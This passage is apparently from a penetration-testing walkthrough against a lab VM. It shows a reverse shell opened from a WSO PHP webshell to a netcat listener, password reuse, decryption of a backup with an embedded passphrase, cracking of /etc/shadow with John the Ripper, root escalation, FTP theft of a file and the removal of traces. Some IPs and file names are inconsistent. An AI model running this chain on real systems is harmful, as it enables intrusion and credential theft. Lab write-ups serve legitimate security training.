e) From the “Network” tab we can launch a reverse shell. This is done in two steps:
From the command shell:
root@kali:~# nc -n -l -p 80 -vvv

From the php webshell:
==== http://192.168.100.138/forum/templates_c/wso2.5.1.php ====
|   Uname:                                                                                                        |
|   User:                                                                                                             |
|   Php:                                                                                                              |
|   Hdd:                                                                                                             |
|   Cwd:                                                                                                             |
|    [Sec. Info] [Files] [Console]       ...     [Network] [Selfremove]          |
|    Network tools                                                                                             |
|                                                                                                                         |
|    Bind port to /bin/sh [perl]                                                                     |
|    Back-connect [perl]                                                                                  |
|        Server: 192.168.100.130      Port: 80      >>                                      |

==============================================


As a result, the reverse shell connection is initiated:
root@kali:~# nc -n -l -p 80 –vvv
listening on [any] 80 ...
connect to [192.168.100.130] from (UNKNOWN) [192.168.100.138] 43357
/bin/sh: 0: can't access tty; job control turned off
$


f) On the remote shell, let’s connect as rhedley and read the content of /opt/backup.sh, if possible:
su - rhedley
$ su - rhedley
Password: tum-ti-tum
rhedley@webhost:~$ id
id
uid=1002(rhedley) gid=1002(rhedley) groups=1002(rhedley),997(ftpuser),999(ftpadmin)
rhedley@webhost:~$ cat /opt/backup.sh
cat /opt/backup.sh
#!/bin/bash
## Backup Script
## by SRaines
## Lazy Admin Corp
TMPBACKUP="/tmp/backup";
 NAME_PREFIX="backup";
NAME_DATE=$(date +%y%m%d);
NAME_HOST=$(/bin/hostname);
FILENAME=${NAME_PREFIX}_${NAME_HOST}_${NAME_DATE}.tar;
 [ ! -d ${TMPBACKUP} ] && mkdir -p ${TMPBACKUP}
 tar cpf ${TMPBACKUP}/${FILENAME} /etc/fstab /etc/apache2 /etc/hosts /etc/motd /etc/ssh/sshd_config /etc/dovecot /etc/postfix /var/www /home /opt
 gzip --best -f ${TMPBACKUP}/${FILENAME}
openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
mv ${TMPBACKUP}/${FILENAME}.gz.enc ./
rm -fr ${TMPBACKUP}
rhedley@webhost:~$


Interesting is that the script gives us information about the encryption algorithm used to protect the backup file we downloaded:

openssl aes-256-cbc -in ${TMPBACKUP}/${FILENAME}.gz -out ${TMPBACKUP}/${FILENAME}.gz.enc -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

g) Let’s decrypt the backup file:
root@kali:~# ls /root/Desktop/ -all | grep 'backup'
-rw-r--r--  1 root root 47984 Oct 23 22:57 backup_webhost_copy.tar.gz.enc
root@kali:~# cd /root/Desktop/
root@kali:~/Desktop# openssl enc -d -aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out decrypted_backup.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
<enc -out decrypted_backup.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs   
root@kali:~/Desktop# tar xvzf decrypted_backup.tar.gz
tar xvzf decrypted_backup.tar.gz
etc/
etc/ssh/
etc/ssh/moduli
...
etc/shadow
...
etc/gconf/gconf.xml.mandatory/%gconf-tree.xml
etc/passwd
root@kali:~/Desktop#


h) Interesting enough, there is a copy of the shadow file saved with the backup so the next step is to crack the file to get the passwords for root and/or swillard users.
root@kali:~/Desktop# john --wordlist="client/darkc0de.lst" --format=sha512crypt shadow
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:02:13 3.06% (ETA: 18:46:46) 0g/s 368.7p/s 1137c/s 1137C/s 12ibb0n..13mm0c973
0g 0:00:02:15 3.19% (ETA: 18:45:02) 0g/s 378.3p/s 1135c/s 1135C/s 13mm4..14min43
0g 0:00:11:42 14.91% (ETA: 18:52:55) 0g/s 361.3p/s 1089c/s 1089C/s GROSSENBACHER..Gasolec
0g 0:00:11:44 15.02% (ETA: 18:52:33) 0g/s 363.1p/s 1089c/s 1089C/s Gasoline..Giebler
0g 0:00:12:29 15.90% (ETA: 18:52:58) 0g/s 363.4p/s 1090c/s 1090C/s Hausa..Hermeneutically
0g 0:00:12:31 15.90% (ETA: 18:53:11) 0g/s 362.3p/s 1089c/s 1089C/s Hausa..Hermeneutically
brillantissimo   (sraines)
mbrown           (mbrown)
2g 0:00:45:35 DONE (2015-11-21 18:20) 0.000731g/s 537.6p/s 1118c/s 1118C/s zrp..�f
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop# john --show
Password files required, but none specified
root@kali:~/Desktop# john --show shadow
sraines:brillantissimo:15773:0:99999:7:::
mbrown:mbrown:15773:0:99999:7:::
2 password hashes cracked, 1 left
root@kali:~/Desktop#


i) And we found the password for swillard user. Let’s try of it helps to get access to root’s home folder. To do that, let’s go back to the remote shell and try from there to connect as swillard and elevate his permissions to root.
As root-type user, the content of /root/ folder can be displayed and the “secret.jpg” file is transferred in the home folder of rhedley, allowing anyone to access it. This is because next step will be to download the file from Target machine onto Attacker’s machine.

root@kali:~# nc -n -l -p 80 -vvv
listening on [any] 80 ...
connect to [192.168.100.193] from (UNKNOWN) [192.168.100.128] 43361
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
...
$ su - swillard
su - swillard
Password: brillantissimo
swillard@webhost:~$ sudo -s
sudo -s
[sudo] password for swillard: brillantissimo

root@webhost:~# cd /root
cd /root
root@webhost:/root# ls
ls
cleanlogs.sh  secret.jpg
root@webhost:/root# cp secret.jpg /home/rhedley/secret.jpg
cp secret.jpg /home/rhedley/secret.jpg
root@webhost:/root# chmod 777 /home/rhedley/secret.jpg
chmod 777 /home/rhedley/secret.jpg
root@webhost:/root# ls -al /home/rhedley/secret.jpg
ls -al /home/rhedley/secret.jpg
-rwxrwxrwx 1 root root 22852 Nov 22 01:17 /home/rhedley/secret.jpg
root@webhost:/root# exit
exit
exit
swillard@webhost:~$  root@kali:~/Desktop#


As mentioned already, let’s download the “secret.jpg” file:

root@kali:~/Desktop# ftp 192.168.100.128
Connected to 192.168.100.128.
220 ProFTPD 1.3.4a Server (LazyAdmin corp.) [192.168.100.128]
Name (192.168.100.128:root): rhedley
331 Password required for rhedley
Password:
230 User rhedley logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxrwx   1 root     root        22852 Nov 22 00:17 secret.jpg
-rw-r-----   1 rhedley  rhedley      1056 Nov 21 22:28 shadow
226 Transfer complete
ftp> get secret.jpg /root/Desktop/secret.jpg
local: /root/Desktop/secret.jpg remote: secret.jpg
200 PORT command successful
150 Opening BINARY mode data connection for secret.jpg (22852 bytes)
226 Transfer complete
22852 bytes received in 0.01 secs (1.5281 MB/s)
ftp> quit
221 Goodbye.
root@kali:~/Desktop# ls
secret.jpg  shadow 
root@kali:~/Desktop#


CONGRATULATIONS! The sensitive file located under the root/admin home folder, “secret.jpg” was downloaded from the Target machine. And the last phase is…

11. Covering Track phase:
a) We’ll use the php webshell. First of all, we’ll delete the files uploaded during this pentest:
The one(s) located in /home/rhedley/
root@kali:~# nc -n -l -p 80 -vvv
listening on [any] 80 ...
connect to [192.168.100.193] from (UNKNOWN) [192.168.100.128] 43361
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/sh")'
...
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ su - rhedley
su - rhedley
Password: tum-ti-tum


rhedley@webhost:~$ ls
ls
secret.jpg 
rhedley@webhost:~$ rm secret.jpg
rm secret.jpg
rhedley@webhost:~$ ls
ls
rhedley@webhost:~$


The one(s) uploaded in /var/www//forum/templates_c/:
==== http://192.168.100.138/forum/templates_c/wso2.5.1.php ====
|   Uname:                                                                                                        |
|   User:                                                                                                             |
|   Php:                                                                                                              |
|   Hdd:                                                                                                             |
|   Cwd: /var/www/forum/templates_c/ drwxrwxrwx [ home ]           |
|    [Sec. Info] [Files] [Console]       ...     [Network] [Selfremove]          |
|    File Manager                                                                                              |
|                                                                                                                         |
|    ...                                                                                                                  |
|        cmd.php                                                                                                 |
|        getfile.php                                                                                              |

|        upload.php                                                                                             |
|        wso2.5.1.php                                                                                          |
|  delete     >>                                                                                                  |
|  ...                                                                                                                    |
===============================================


b) In the end, we’ll delete the php webshell itself. The function is under “Selfremove” tab:
==== http://192.168.100.138/forum/templates_c/wso2.5.1.php =====
|   Uname:                                                                                                             |
|   User:                                                                                                                  |
|   Php:                                                                                                                   |
|   Hdd:                                                                                                                  |
|   Cwd: /var/www/forum/templates_c/ drwxrwxrwx [ home ]                |
|    [Sec. Info] [Files] [Console]       ...     [Network] [Selfremove]               |
|    Suicide                                                                                                             |
|    remove the shell?                                                                                           |
|    Yes                                                                                                                    |
|  ...                                                                                                                         |
================================================


Conclusion:
Each pentest exercise is a succession of steps. They can be grouped in the categories/phases discussed in the introduction of this article, but the order they are executed it is not fixed, excepting probably the first and the last step. Any of the steps, might be repeated, depending what information is learned about the system and it can be used to permit access into the Target system. In the end, the scope s the same one: getting access to the sensitive information located on the Target machine.